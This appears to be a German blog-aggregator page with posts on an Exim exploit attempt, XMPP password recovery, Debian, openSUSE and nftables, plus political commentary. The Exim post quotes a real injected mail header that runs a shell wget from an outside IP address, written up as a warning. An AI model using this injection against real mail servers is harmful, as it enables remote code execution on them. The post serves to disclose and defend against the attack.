20.06.2019

Sabine Becker (AtariFrosch)

Achtung, Exim-Bug unterwegs!

Gestern erhielt ich zwei … „interessante“ E-Mails an den root-Account meines Servers. Der Body war jeweils leer. Der Header sieht so aus:

Return-Path: <support@service.com>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Delivered-To: root+${run{x2Fbinx2Fsht-ctx22wgetx2064.50.180.45x2ftmpx2f176.9.63.237x22}}@atari-frosch.de
Received: from service.com (flamingw.arvixecloud.com [108.175.157.131])
        by mail.atari-frosch.de (Postfix) with SMTP id B61EAC9E8;
        Wed, 19 Jun 2019 16:58:45 +0200 (CEST)

Darunter folgten noch 31 Received-Zeilen, die jedoch nur jeweils die Zahlen von 1 bis 31 enthielten. Die To:-Zeile ist dabei das Spannende:

Wenn man da nämlich die encodeten Zeichen in Klartext umsetzt, kommt das hier raus:

root+${run{/bin/sh -ct "wget 64.50.180.45/tmp/176.9.63.237"}}@atari-frosch.de

Da steht also im localpart der Mailadresse (dem Teil vor dem @) eine Anweisung, die man eigentlich an der Konsole eingeben würde, davon ausgehend, daß der Mailserver das tatsächlich so interpretieren und dann auch ausführen würde. Das wäre schon ein sehr heftiger Bug, nicht wahr?

Das Krasse daran: Es ist tatsächlich einer, und zwar in der Mailserver-Software Exim. Nachdem ich diese lustige To:-Zeile auf Twitter gepostet hatte, wurde ich auf CVE-2019-10149 – „The Return of the WIZard“ – aufmerksam gemacht.

Allerdings hatte ich anfangs nur einen Teil der encodeten Zeichen als solche erkannt, weshalb ich das so gelesen hatte, daß wget aus einem Verzeichnis /bin/sht-ctx/ heraus aufgerufen werden sollte. Dieses Verzeichnis gibt es wohl tatsächlich – allerdings eher nicht auf Linux-Systemen. Es scheint eher was mit Solaris zu tun zu haben. Ich hab da allerdings nur oberflächlich recherchiert und das nicht genauer verfolgt.

Also: Wer Exim als Mailserver nutzt, sollte unbedingt und ganz schnell das Update einspielen!

Dankeschön an Freddie Leeman, der meinen Tweet wohl via @AlexSchestag gesehen und beantwortet hat.

Achja. Postfix guckt nur 'n bißchen komisch, sieht root+ als Beginn des localparts und räumt die Mail dann schulterzuckend in den root-Mailaccount. 😉

Das liegt daran, daß eigentlich alles, was nach einem + im localpart folgt, inclusive diesem vom Mailserver ignoriert werden soll. Mit dieser Methode kann man sich Mailadressen für bestimmte Zwecke quasi markieren, ohne das explizit in den Mailserver eintragen zu müssen. Im Mailprogramm kann man aber nach diesen Adreß-Zusätzen filtern und die Mails an diese erweiterte Adresse in ein separates Verzeichnis verschieben. Oder auch erkennen, wenn sie wo gelandet ist, wo sie nicht hinkommen sollte.

Für den Mailaccount von root ist das wohl eher ungewöhnlich, aber natürlich genauso möglich wie für alle anderen Mailaccounts.

[Update 2019-06-20 18:50] – Alex war, genau wie mir vorher auch schon, aufgefallen, daß da bei der „Auflösung“ des Encodings eventuell noch was nicht stimmen kann. Daher fragte er nochmal bei Freddie Leeman nach:

OK, ganz stimmte seine Interpretation noch nicht, deshalb hatte ich mich dann doch nochmal in den Thread mit eingemischt. Die Erklärung von Freddie war sinngemäß: Ja doch, paßt schon. Da stand nämlich ursprünglich nicht nur „t“, sondern „\t“, was für einen TAB steht. Der wiederum wird genauso wie ein Leerzeichen als „white space“ interpretiert; auf einer Konsole würde das also genauso funktionieren wie mit einem Leerzeichen.

Es waren offenbar auch noch weitere \ in der Zeichenkette enthalten gewesen, nämlich vor jedem encodeten Zeichen. Nur hat Postfix die offenbar rausgenommen, weil die da halt einfach nicht hingehören; das ist kein erlaubtes Zeichen im localpart einer Mailadresse. Damit stand das „t“ plötzlich alleine da bzw. schien zu den vorhergehenden Buchstaben zu gehören.

Ich hatte erst auf einen Typo beim Absender getippt, aber diese Erklärung ist natürlich noch sinnvoller. Ja, und da muß ich Postfix doch einfach mal loben. 🙂 Und natürlich auch den Freddie für die geduldigen Antworten.

[/Update]

von Atari-Frosch am 20.06.2019 14:51

Martin Dosch (Dogge)

Kurztipp: Passwort eines XMPP-Kontos aus Conversations extrahieren (root)

Manchmal nutzen Leute keinen Passwortmanager und vergessen das Passwort ihres XMPP-Kontos. Conversations hat vor einigen Versionen die Möglichkeit entfernt sich das Passwort anzeigen zu lassen, aber sofern das Telefon gerooted ist kann man an die Datenbank kommen und das Passwort, z.B. mit sqlitebrowser, aus der sqlite-Datenbank auslesen:

$ adb shell "su -c 'cat /data/data/eu.siacs.conversations/databases/history'" > history && sqlitebrowser ./history

In sqlitebrowser kann man die Passwörter aller Konten dann im Reiter Daten durchsuchen einsehen.

20.06.2019 12:50

17.06.2019

Gerrit Kruse (MrGerardCruiz)

Microsoft löst sich von Windows

Das einzige plattformübergreifend verfügbare Produkt war lange Microsoft Office. Ansonsten benötigte man für Microsoft Dienste Windows. Das ändert sich nun rasant und hängt mit dem allgemeinen Wandel von Microsoft als Konzern zusammen.

Windows war noch nie ein besonders gutes Betriebssystem. Selbst bei den besseren Versionen wie XP oder 7 gab es viele strukturelle Mängel. Viele originale Microsoft-Entwicklungen und Zukäufe sind allerdings Quasi-Standards in ihren Bereichen und sorgten zuverlässig dafür, dass Firmen und Privatanwender an Windows gebunden blieben - denn nur dort liefen sie.

Das ändert sich nun rasant. Den Anfang machte Microsoft mit Office. Zwar existierte schon lange ein Produkt namens "Office for Mac", aber dieses hinkte im Funktionsumfang hinterher und war qualitativ auch nicht besonders überzeugend. Seit vergangenem Jahr basieren die unterschiedlichen Office-Versionen jedoch auf einer gemeinsamen Codebasis. Seitdem hat man die Schlagzahl aber massiv erhöht. Die Herzstück vieler firmeninternen Kommunikationsprozesse - Outlook - ist ebenso für Mac verfügbar wie OneDrive und OneNote. Seit heute steht auch die Aufgabenverwaltung Microsoft To Do zur Nutzung bereit. Die neue Version von Edge konnte dank Chromium Codebasis ebenso auf Mac portiert werden. Inzwischen kann man einen Mac nutzen und trotzdem im Ökosystem von Microsoft verbleiben. Wenn jetzt noch Access kommt ist das Softwarepaket komplett.

Die Ambitionen scheinen auch nicht auf den Mac beschränkt zu sein, sondern es halten sich Gerüchte über einen Edge-Port für Linux. Auf den beiden erfolgreichen Mobilsystemen Android und iOS ist Microsoft mit seinen Apps schon länger präsent. Mit dem WSL 2 macht Microsoft dann auch noch gegenläufige Entwicklungsschritte für das hauseigene Betriebssystem.

Das ganze folgt meiner Meinung nach keinem großen Plan bei Microsoft, sondern man hält sich viele Optionen offen. Windows verliert an Bedeutung, weil es an den Desktop und Notebook gebunden ist und diese Geräteklassen an Bedeutung verlieren. Das eigene System hat man nicht erfolgreich auf andere Gerätetypen portieren können und unternimmt wohl auch zukünftig keine diesbezüglichen Versuche mehr. Neben der Azure-Plattform möchte man mit den breit verfügbaren Diensten wohl das eigene Geschäftsmodell in eine Post-Windows-Zeit retten.

Manche mutmaßen schon, dass das nächste Windows dann nur noch eine Oberfläche für Linux mit virtueller Maschine für Legacy-Software wird. Ob es so kommt werden wir sehen. Angesichts der strukturellen Defizite von Windows 10 im Bereich der Anwenderprivatsphäre wäre es nicht schade drum.

Bilder:
Einleitungsbild und Beitragsbild von von geralt via pixabay

"

von Gerrit (postfach@curius.de) am 17.06.2019 08:37

16.06.2019

Christian Imhorst (immi)

Tagesschau im Firefox gucken mit openSUSE

Es muss natürlich nicht nur die Tagesschau sein, es geht um Multimedia im Allgemeinen bei openSUSE: Standardmäßig werden aus rechtlichen Gründen nur freie, offene, also nicht patentgeschützte Formate wie Ogg und Flac unterstützt. Für die Wiedergabe von Online-Videos im Firefox wird Software aus einem zusätzlichen Repository wie Packman benötigt.

Ein Repository kann unter openSUSE entweder über YaST hinzugefügt werden, indem man unter der Kategorie „Software“ auf „Software-Repositories“ klickt, dann auf „Hinzufügen“ und dann auf „Community-Repositories“. Unter Leap wird Packman gleich angeboten, unter Tumbleweed trägt man es dann ein (Adresse siehe weiter unten).

Alternativ fügt man das Repository im Terminal mit zypper hinzu:

sudo zypper addrepo -f http://packman.inode.at/suse/openSUSE_Leap_15.1/ packman

Wer Tumbleweed benutzt schreibt statt „openSUSE_Leap_15.1/“ dann „openSUSE_Tumbleweed/“. Danach werden die nötigen Pakete zuerst upgedatet:

zypper up --allow-vendor-change

Und anschließend installiert, was eventuell noch fehlt:

sudo zypper install --allow-vendor-change ffmpeg lame gstreamer-plugins-bad gstreamer-plugins-ugly gstreamer-plugins-ugly-orig-addon gstreamer-plugins-libav libavdevice56 libavdevice58 libdvdcss2 vlc-codecs libavcodec56 libavcodec57 libavcodec58 libavformat56 libavformat57 libavformat58 libavdevice56 libavdevice57 libavdevice58

Die Lösung funktioniert ganz gut für openSUSE Leap und Tumbleweed, wenn man Videos in der Mediathek z.B. auf ARTE.TV, die Tagesschau, oder den Eurosport Player TV-Kanal sehen möchte.

Mehr Infos:

von Christian Imhorst am 16.06.2019 13:16

Gerrit Kruse (MrGerardCruiz)

Debian 10 "Buster" - Beim Dinosaurier nichts Neues

Am 06. Juli veröffentlicht das Debian Projekt voraussichtlich die nächste Version Debian 10 "Buster". Wie bei Debian üblich befindet sich die Version seit längerem im Freeze und kann daher bereits getestet werden. Grund genug sich mit der Mutter aller LTS-Distributionen zu befassen.

Seit der Veröffentlichung des Vorgängers sind gut zwei Jahre vergangen und dadurch bringt Debian 10 natürlich zahlreiche aktualisierte Versionen. Die relevanten Desktopumgebungen haben folgende Versionsstände:

  • GNOME 3.30
  • KDE Plasma 5.14
  • LXDE 10
  • LXQt 0.14
  • MATE 1.20
  • Xfce 4.12.

Als Basis verwendet man Linux 4.19, sowie systemd 241 und Mesa 18.3. In den Veröffentllichungshinweisen listet man zudem ein paar strukturelle Neuerungen auf. Debian nutzt nun standardmäßig AppArmor, sowie LUKS2. Ansonsten gibt es noch ein paar kleinere Änderungen.

Die Desktopumgebungen wie GNOME oder KDE Plasma liefert Debian - abgesehen vom Wallpaper - gemäß den Standardvorgaben der Entwickler aus. Lediglich Firefox ESR und LibreOffice sind immer enthalten. Eine übergreifende Benutzerphilosophie, wie sie teilweise andere Distributionen verfolgen, fehlt gänzlich.

Das Wallpaper ist bezeichnend, da man bei dem Test sich nicht des Gefühls erwehren kann, dass ein leichter Grauschleier sich über die Distribution gelegt hat.

Subsummierend kann man also sagen, dass es bei Debian nichts Neues gibt. Langjährige Anwender erhalten eine Aktualisierung der Versionsstände, die aber teilweise auch schon wieder nicht mehr taufrisch sind. Bei KDE hat man immerhin gerade KDE Plasma 5.16 herausgeben und GNOME ist auch schon eine Version weiter. Den Debian-Nutzer wird das aber kaum stören, weil Versions-Enthusiasten andere Distributionen nutzen.

Die Änderungen unter der Haube fallen aber sogar für Debian-Verhältnisse schmal aus. Das Projekt befindet sich scheinbar im Wartungsmodus. Seine Bedeutung hat Debian heute vor allem als Basis für andere Projekte.

Bilder:
Einleitungs- und Beitragsbild von stevepb via pixabay

"

von Gerrit (postfach@curius.de) am 16.06.2019 09:46

12.06.2019

Bernd Dau (whisper)

Must-Have bzw. nice to have packages nach dem Neuinstallieren von Debian

Ich stelle immer wieder fest, das ich nach einer Neuinstallation nicht auf Anhieb an alle Helferlein und Tools denke, die mir in meinem Dasein als Debian Nutzer ans Herz gewachsen sind.

Deshalb hier die lose Zusammenstellung meiner Favoriten mit kurzer Erläuterung dazu.

Die Reihenfolge hat keine Bedeutung, sind mir halt so eingefallen.

 

Paketname Paket Beschreibung Bemerkung
ncdu ncurses disk usage viewer Unentbehrlich, um die Platzverschwender zu orten und auch gleich ggfs. zu löschen
dlocate fast alternative to dpkg -L and dpkg -S

 Wenn man mal wieder nicht weiß zu welchem Paket eine Datei gehört.

Das Paket muß natürlich auch installiert sein.
mlocate quickly find files on the filesystem based on their name  locate -i mitgliedschaft findet alle Dateien mit mit diesen Namen
apt-file                 search for files within Debian packages (command-line interface)  Gegenüber dlocate findet es auch Dateien in nicht installierten Pakteten. Erstellt dazu eine Datenbank
localepurge Reclaim disk space removing unneeded localizations
 		 Einmal konfiguriert, tut es zuverlässig seinen Dienst, allerdings verlangsamt es ein apt-get install bzw. upgrade....
htop interactive processes viewer Das bessere top
iotop interactive IO Viewer Welcher Prozess macht am meisten IO?
debian-goodies Kleine Programmsammlung für Debian-Systeme u.a. dpigs smile
tlp Save battery power on laptops Wenn man einen Laptop hat, nützlich um die Ladeschwelle für den Akku einzustellen
hdapsd HDAPS daemon for various laptops with motion sensors Fallschutz für Laptops
smartmontools control and monitor storage systems using S.M.A.R.T. Gesundheit der Platten überwachen
inxi full featured system information script

z.B. mit inxi -v6 eine Äbersicht gewinnen
aha

ANSI color to HTML converter

 z.B. inxi -v6|aha >t500.html
shellcheck Prüft ein Shell Script auf typische Fehler z.B. shellcheck mein-script.sh
wird ergänzt    
"Must-Have bzw. nice to have packages nach dem Neuinstallieren von Debian" vollständig lesen

von bed (nospam@example.com) am 12.06.2019 12:18

08.06.2019

Sabine Becker (AtariFrosch)

Altersrente, LOL

Immer wenn es um die Rente geht, höre ich – auch und gerade von der SPD – solche Sätze wie „wenn man 35 Jahre lang gearbeitet hat, muß man eine auskömmliche Rente bekommen“ oder überhaupt die Sprüche von der harten Arbeit und so. Und jedesmal denke ich mir: Also erstens meint Ihr Einkommen, nicht Arbeit. Denn darauf, ob eins (abhängig, bezahlt – alles andere zählt ja nicht) gearbeitet hat, kommt es ja schon lang nicht mehr an, sondern darauf, wieviel eins verdienen durfte.

Und zweitens: Brauchen die, die das mit der Erzeugung von Einkommen nicht hinbekommen haben, aus welchen Gründen auch immer, im Alter nix? Oder wird gleich davon ausgegangen, daß einkommensarme und -lose Menschen gefälligst gar nicht so alt werden sollen, daß sie genügend hohe Rentenansprüche haben könnten?

Oury hat dazu heute einen Tweet verfaßt:

Darauf kamen noch ein paar bemerkenswerte Antworten von Menschen, denen es ähnlich geht:

Ich hatte selbst auch was beigetragen:

Die 15 Jahre chronischer Depression und das Trauma, die durch die Amtsschikanen ausgelöst wurden, paßten schon nicht mehr in den Tweet.

Ja, „liebe“ Parteien , „liebe“ „Sozial“-Politiker, „liebes“ BMAS, was ist mit uns? Weil wir als behinderte Menschen, als depressive Menschen, als Menschen, die aus welchen Gründen auch immer nicht in die Schubladen passen und nicht wunschgemäß ausbeutbar, ähm, nicht leistungsfähig genug sind, eine Minderheit sind, kann man uns einfach unter den Bus werfen oder drauf hoffen, daß wir früh sterben? Ist das Eure Sozial- und Rentenpolitik?

Meine Altersrente wird nach derzeitigem Stand wie gesagt weniger als 400 € im Monat betragen. Das reicht nicht einmal für die reinen Lebenshaltungskosten. Heißt: Sozialhilfe bis zum Tod. Mit allen dazugehörigen Schikanen und ohne jegliche Chance, sinnvoll (!) etwas dazuzuverdienen, ohne daß es mir größtenteils wieder gestohlen wird.

Der Witz ist ja: Wenn bei mir da jetzt schonmal gelegentlich der Gedanke aufkommt, in diesem Fall tatsächlich bewußt „sozialverträglich frühabzuleben“, schreien bestimmt mindestens die Möchtegern-Christen auf und sagen, das gehe ja gar nicht, das Leben sei doch so wertvoll. Aber dauerschikaniert, traumatisiert, zwangsverarmt und dann vermutlich auch wieder depressiv leben, ja, das ist OK, damit haben sie kein Problem.

Altersrente, LOL.

[Update 2019-06-09 16:30] Es kamen noch viel mehr bzw. einige hatte ich auch übersehen, weil Tweetdeck nicht immer alle Antworten anzeigt:

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

(Thread:)

[/Update]

von Atari-Frosch am 08.06.2019 16:07

07.06.2019

Jörg Kruse (4A4B)

Wechsel von iptables nach nftables unter Debian

Mit der kommenden Stable-Version Debian 10 („Buster“) wird iptables durch nftables als Standardwerkzeug zum Filtern von IP-Paketen ersetzt. Das mitinstallierte Paket iptables-nftables-compat ermöglicht es hierbei, weiterhin die alten ip-, ip6-, arp- und ebtables Regeln zu laden. Daneben enthält es auch Tools, mit welchen die alten Rules in ein entsprechendes nftables Ruleset übersetzt werden können.

Nftables bringt für den Anwender einige Vorteile mit sich. Als zwei Beispiele seien hier genannt, dass Tabellen für IPv4 und IPv6 nicht mehr getrennt definiert werden müssen und Regeln auch mehrere Aktionen enthalten können. Im Wiki von nftables, welches eine umfassende Dokumentation enthält, sind die wichtigsten Unterschiede gegenüber iptables aufgelistet.

Bereits in Debian 9 („Stretch“) ist es möglich, nftables über den Paketmananger zu installieren. Im Repository von Stretch befindet sich die schon etwas ältere Version 0.7, die ein paar Einschränkungen mit sich bringt, aus den Backports (stretch-backports) kann man aber Version 0.9 erhalten, welche auch in Debian Buster verfügbar ist. Zusätzlich zu nftables empfiehlt es sich, iptables-nftables-compat zu installieren, wenn man die darin enthaltenen Übersetzungstools nutzen möchte. Mit iptables-translate lassen sich beipielsweise einzelne Befehle und mit iptables-restore-translate ein ganzer Regelsatz übersetzen, siehe hierzu die Beispiele in der Manpage von xtables-translate(8).

Der Regelsatz, der von nftables geladen wird, ist unter Debian in der Datei /etc/nftables.conf gespeichert. Nach der Installation von nftables enthält die Datei ein minimales Ruleset, welches alle IP-Pakete durchlässt. Beispiel-Konfigurationen für verschiedenene Anwendungsfälle finden sich unter /usr/share/doc/nftables/examples. Bei einem komplexen Setup empfiehlt es sich ggf., die Konfiguration erst auf einem Testsystem zu erproben und fertigzustellen, bevor diese auf einem Produktivsystem eingesetzt wird.

Sofern systemd als Systemmanager verwendet wird (was in Debian 9 und 10 standardmäßig der Fall ist), lässt sich nftables darüber starten, um das fertige Ruleset zu laden:


# systemctl start nftables

Analog zu „iptables -L -nv“ kann man sich nun mit dem Kommandozeilen-Tool nft den Regelsatz inklusive Counter ausgeben lassen:


# nft list ruleset

Um das Ruleset in /etc/nftables.conf auch nach dem nächsten Boot zu laden, wird nftables als Service-Einheit unter Systemd aktiviert:


# systemctl enable nftables

Spätestens vor dem Reboot sollte ggf. iptables-persistent deinstalliert werden, damit darüber nicht mehr das alte iptables Ruleset geladen wird.

von Jörg am 07.06.2019 11:52

06.06.2019

Martin Dosch (Dogge)

TUI Programme

Seit einiger Zeit nutze ich für einige alltäglichen Aufgaben hauptsächlich TUI (Text User Interface) oder CLI (Command Line Interface) Programme. Das ist häufig bei Programmen praktisch, bei denen man viel mit Text arbeitet (z.B. Chat oder Email), da man dann nicht ständig zwischen Tastatur und Maus/Touchpad wechseln muss.

Hier mal eine Auswahl meiner Favoriten:

Nutzt ihr auch gerne TUI/CLI Programme? Falls ja, welche?

Update 2019-06-10

Angeregt durch die Kommentare habe ich htop, ncdu, nano, mpc, ncmpcpp und tmux hinzugefügt, die ich zuvor vergessen hatte.

  1. CLI per khal, TUI per ikhal Befehl. [return]
  2. mpc ist ein CLI Programm, ncmpcpp ist ein TUI Programm. [return]

06.06.2019 10:06

30.05.2019

Steffen Rumberger (inne)

i have this attitude: na minsan nahihiya, minsan walang hiya

i have this attitude: na minsan nahihiya, minsan walang hiya

30.05.2019 16:00

(c3f2o)

AfD watch Bundestag: Parlamentswoche 15.-17. Mai 2019

„Deutschland zuerst!“, diese für jedes Land adaptierbare Parole der modernisierten radikalen Rechten kennzeichnet die Debatten der AfD im Bundestag in der Woche vor der Europawahl. Und wie schon beim Thema Flucht und Migration versucht die AfD auch das EU-Thema sozialpolitisch aufzuladen. Ein Antrag von ihr in der Sitzungswoche lautet: „Einsparungen aus dem EU-Budget nutzen – Durchschnitts- und Geringverdiener bei den Sozialabgaben entlasten“ (Drs. 19/10170). In diesem Antrag verspricht sie eine Entlastung beim Arbeitnehmeranteil der Sozialversicherungsbeiträge von 300 Euro. Der Abgeordnete Jörg Schneider führt zur Finanzierung dieses Vorhabens aus: „Ein Großteil der Finanzierung dieses Projekts kommt aus einem anderen Topf, und zwar möchten wir die EU-Beiträge der Bundesrepublik Deutschland deutlich reduzieren. (…) Wir möchten, dass dieses Steuergeld im Land verbleibt. Wir möchten mit diesem Geld die Geringverdiener in Deutschland entlasten.“ (Deutscher Bundestag, 19. Wahlperiode, Protokoll 101. Sitzung, S. 12170). Uwe Witt als zweiter AfD-Redner in der Debatte stößt ins gleiche Horn: „Wir vertreten die Interessen der für wenig Geld hart arbeitenden Menschen in unserem Land. Genau: In unserem Land, und das heißt Deutschland.“ (Ebd., S. 12177) Allerdings sieht die AfD die soziale Frage immer als eine Verteilungsfrage zwischen Gruppen in der unteren Hälfte der Gesellschaft (den subalternen Klassen) und niemals als eine Frage der Umverteilung von oben nach unten. So heißt es bei Witt weiter: „Teilweise geht es Bürgern, die von Sozialleistungen leben, besser als der arbeitenden Bevölkerung im Niedriglohnbereich.“ (Ebd.) Letzteren will die AfD aber nicht abschaffen sondern mit der Umverteilung von EU-Mitteln zementieren, wie die Linke Abgeordnete Susanne Ferschel ausführt: „Letztlich läuft es damit auf ein staatliches Förderprogramm für den Niedriglohnbereich hinaus.“ (Ebd., S. 12174)

Unten gegen unten – diese Sicht prägt auch die AfD-Position zum Thema Grundrente, wo sie im Gleichschritt mit der FDP gegen eine generelle Grundrente für Niedrigverdiener_innen argumentiert. Auch hier geht es der AfD nicht darum, wie die Finanzierung z.B. über Umverteilung von oben nach unten geregelt werden kann, sondern sie spielt die abhängig Beschäftigten gegeneinander aus. Die von der AfD als „Respektrente“ bezeichnete Rente sei: „respektlos den hart arbeitenden Arbeitnehmern gegenüber (…), respektlos der jungen Generation gegenüber und respektlos auch allen Rentnern gegenüber; denn es ist natürlich klar, dass das letztendlich die Rentenkasse belastet.“ (Ebd., S. 12229)

Aber mit Blick auf den Osten und die Wahlen dort bemüht sich die AfD immer mal wieder, sozialpolitische Duftmarken zu setzen und thematisiert auch prekäre Arbeitsverhältnisse. Die Fraktionsvorsitzende Weidel ist in der Debatte zu 70 Jahre Grundgesetz sichtlich darum bemüht, ihr neoliberales Image zu verändern: „Die Politik berauscht sich an Statistiken, die hohe Beschäftigungszahlen bei stagnierendem Wirtschaftswachstum vorgaukeln. Pizzaboten, Paketzusteller und Fahrradkuriere sind aber kein Ersatz für produktive Arbeitsplätze, die den Wohlstand erst schaffen, den der Sozialstaat verteilt. Der politisch erzwungene Umbau Deutschlands vom Hochleistungsindustriestandort zum Niedriglohnland vernichtet die ökonomische Substanz, die den Sozialstaat am Laufen hält. Und damit wird auch das in Artikel 20 des Grundgesetzes festgeschriebene Sozialstaatsgebot zum toten Buchstaben und zur leeren Hülle.“ (Ebd., S. 12156) Aber Weidel kann eben nicht aus ihrer Haut und beschreibt den Sozialstaat tatsächlich immer als Last die es nicht bräuchte, wenn der Markt nur ohne politische Eingriffe sein Werk verrichten könnte.

Ein zweiter Antrag zur Kürzung von EU-Geldern („EU-Budget zum Wohle Europas kürzen“, Drs. 19/10171) soll die AfD-Position vor der Europawahl noch einmal präsentieren. Die Abgeordnete Malsack-Winkemann macht in ihrer Rede aber vor allem deutlich, dass die AfD gegen jede Form von Sozialpolitik auf EU-Ebene ist und vor welchem ideologischen Hintergrund sie diese Position vertritt. Mit Verweis auf das Subsidiaritätsprinzip verwirft sie alle Ansätze einer europäischen Sozialpolitik: „Warum greift die EU hier ein? Was genau kann hier auf regionaler oder lokaler Ebene nicht ausreichend verwirklicht werden? Antwort: nichts.“ (Deutscher Bundestag, 19. Wahlperiode, Protokoll 102. Sitzung, S. 12472) Angesicht von Dumpingwettbewerb und der immer größeren sozialen Schieflage in Europa eine gewagte Behauptung. Aber Ungleichheit und uneingeschränkter Wettbewerb sind gerade die Säulen einer Sozial- und Wirtschaftspolitik im Sinne der AfD, die zumindest in der Bundestagsfraktion nach wie vor zahlreiche Anleihen beim Neoliberalismus macht: „Wissen Sie, es ist eines der großen Missverständnisse der Geschichte, dass Menschen immer wieder glauben, man könne durch Zentralismus und Planwirtschaft den Wohlstand fördern. Das Gegenteil ist der Fall. Der sozialistische Traum, mit dem Sie, die Grünen, die Linken, die SPD und nicht zuletzt Sie, die Merkel-CDU/ CSU, und Macron die Menschen ködern wollen, die Idee vom starken und guten Zentralstaat, hat in der Geschichte immer zur Knechtschaft geführt – niemals zur Freiheit. Am Ende der Zentralisierung stand immer Regulierung, Bevormundung, Zensur und vor allem die Verarmung der Massen, während die Funktionseliten auf Kosten der einfachen Leute in Saus und Braus leben. Bei von Mises und Hayek ist das gut beschrieben, oder bei Roland Baader. Er prophezeite bereits 1993 in seinem Buch ‚Die Euro-Katastrophe‘: ‚Das Sozialeuropa der Gleichheitsfanatiker wird sich zum Klüngel-, Erpressungs- und Ausbeutungskontinent mausern, zu einer Umverteilungs- und Verschiebegemeinschaft von welthistorischer Singularität.‘“ (Ebd., S. 12473) Staatliche Eingriffe und Planung als Teufelszeug und sozialistische Träume von der LINKEN bis zur Union (nur die FDP wird ausgenommen) – dieses Mantra neoliberaler Theologie kommt von der „Partei der kleinen Leute“.

Zwei Zitate aus dem Antrag der AfD zeigen schlaglichtartig die Borniertheit des nationalistischen Politikansatzes: „Umweltschutz liegt in der Verantwortung der Nationalstaaten und sollte nicht von der EU betrieben werden. Klimaschutz ist eine Irreführung der Öffentlichkeit, die dem Umweltschutz zuwiderläuft und in hohem Maße Ressourcen verschlingt ohne Ergebnisse zu erzielen. Das EU-Budget ist um die entsprechenden Beträge zu kürzen.“ Auch die „Rückholung der Digitalpolitik auf die nationalstaatliche Ebene“ wird als „angemessen“ von der AfD angesehen (Zitate vgl. Drs. 19/10171). Mit der schwarz-rot-goldenen-Brille sieht man schlechter – so viel lässt sich sagen.

„Die wirkliche Gefahr geht von denen aus, die das Gleichgewicht zwischen Freiheit und Gleichheit immer von neuem zulasten der Freiheit verschieben wollen.“ (Deutscher Bundestag, 19. Wahlperiode, Protokoll 101. Sitzung, S. 12147) Diese Beschreibung der deutschen Gesellschaft als einem vor allem von einem Übergewicht an Gleichheit geprägten Land, mit der die Freiheit zu ersticken drohe, stammt nicht von der FDP, sondern vom AfD-Fraktionsvorsitzenden Alexander Gauland, geäußert in der Debatte zum 70. Jahrestages des Grundgesetzes. Angesichts einer gerade zwei Wochen zuvor vom Deutschen Institut für Wirtschaftsforschung (DIW) vorgelegten Studie zur wachsen Ungleichheit der Einkommen in Deutschland bemerkenswerte These. Aber Gauland und der AfD geht es bei Fragen der Gleichheit selten bis nie um soziale Gleichheit, ihr Augenmerk richtet sich auf gleiche Rechte und Teilhabe für Minderheiten in der Gesellschaft – gegen diese Form der Teilhabe macht die AfD immer dann Politik, wenn sie sich nicht selbst als verfolgte Minderheit stilisiert. Gauland vertritt scheinbar einen liberalen Ansatz wenn er formuliert: „Das Grundgesetz ist ein Rahmen, in dem vieles möglich ist, auch Kevin Kühnerts Enteignungsfantasien oder eine demokratische Identitätspolitik, wie wir sie vertreten.“ (Ebd.) Verschleiert werden soll so, dass die AfD eine völkische Form der Identitätspolitik vertritt, die dem Gleichheits- und Menschenwürdegrundsatz des Grundgesetzes diametral zuwiderläuft.

Jede Woche bietet die AfD-Fraktion unzählige Beispiele dieser völkischen Sichtweise und der Verächtlichmachung von Bevölkerungsgruppen aufgrund ihrer Herkunft. So heißt es bei Gottfried Curio in der Debatte zum Thema „Ausreisepflicht“ (sprich: Abschiebungen) mit Blick auf die Ausweitung der Abschiebehaft: „Aber was ist schlimm daran, wenn Asyltäuscher dort zwischenverwahrt werden?“ (Deutscher Bundestag, 19. Wahlperiode, Protokoll 101. Sitzung, S. 12186) Die als Betrüger – „Asyltäuscher“ – markierte Gruppe wird verdinglicht und kann „zwischenverwahrt“ werden. Als Individuen gibt es diese Menschen bei Curio nicht, sie sind Teil einer homogenen und kriminellen Gruppe: „Angesichts des Ausländeranteils in Gefängnissen von über 50 Prozent ist das doch nicht wirklich eine fremdartige Umgebung.“ (Ebd.) Volksverhetzung im umgangssprachlichen Sinne ist im Bundestag inzwischen ohne Probleme möglich.

Den völkischen Geruch möchte die AfD im Bundestag vor allem durch eine betonte Israelfreundschaft und den angeblichen Kampf gegen Antisemitismus übertünchen. So hat die AfD einen Antrag mit der Forderung nach Verbot der BDS-Bewegung in Deutschland vorgelegt, mit dem auch die anderen Fraktionen dazu genötigt wurden, eigne Initiativen zu dieser Boykottkampagne vorzulegen. In der Debatte behauptet der AfD-Abgeordnete Jürgen Braun: „Die AfD ist die Partei der Freunde Israels in diesem Parlament.“ (Deutscher Bundestag, 19. Wahlperiode, Protokoll 102. Sitzung, S. 12483) Sicher ist die AfD ein Freund der israelischen Rechtsregierung – bisher allerdings einseitig, denn die israelische Seite empfängt bis heute keine Delegationen des Bundestages unter Beteiligung von AfD-Parlamentariern. Holocaustmahnmal als Schandmahl, NS-Vergangenheit als Vogelschiss, Antisemiten in der Fraktion in Baden-Württemberg – selbst der Netanjahu-Regierung ist klar, womit sie es bei der AfD zu tun hat. Der AfD geht es in diesen Debatten vor allem darum, die politische Rechte vom Antisemitismus freizusprechen und ihn als Problem der Linken und des Islam zu markieren: „Offene Feindschaft gegenüber Juden in Deutschland hat wieder eine Bühne. Der Antisemitismus kommt heute von der linken Seite, und er kommt aus dem Islam.“ (Ebd.)

Der Abgeordnete Bystron von der AfD liefert in einer eigentlich dem Thema des Bundeswehreinsatzes im Libanon gewidmeten Debatte ein besonders schrilles Beispiel dieser Vereinnahmung Israels und macht gleich die SPD als Hort des Antisemitismus und Linksextremismus aus: https://dbtg.tv/fvid/7356181

